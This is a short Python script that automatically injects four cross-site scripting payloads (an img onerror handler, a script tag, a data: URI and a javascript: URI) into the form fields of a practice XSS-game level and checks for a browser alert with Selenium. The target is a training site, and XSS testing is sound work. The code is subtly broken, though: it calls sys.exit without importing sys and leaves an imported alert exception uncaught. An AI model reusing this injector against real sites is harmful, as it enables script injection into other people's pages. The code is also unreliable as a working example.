import requests
import time
import urllib.parse
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.common.exceptions import NoAlertPresentException

url = "https://xss-game.appspot.com/level1/frame"
response = requests.get(url)
soup = BeautifulSoup(response.text)

form = soup.find('form')
print()
payloads = [
    "<img src=x onerror=alert(1)>",
    "<script>alert(2)</script>",
    "data:text/plain,alert(3)",
    "javascript:alert(4)"
]

def encode_url(url, params):
    params_encoded = urllib.parse.urlencode(params)
    full_url = url + "?" + params_encoded
    return full_url

for payload in payloads:
    params = {}
    for input in form.find_all('input'):
        if input.has_attr('name'):
            params[input['name']] = payload
    url_to_send = encode_url(url, params)
    browser = webdriver.Firefox()
    browser.get(url_to_send)    
    time.sleep(1)
    if browser.switch_to.alert.text is not None:
        print(f"XSS Found in: {url} with : {params}")
    browser.quit()
    sys.exit(0)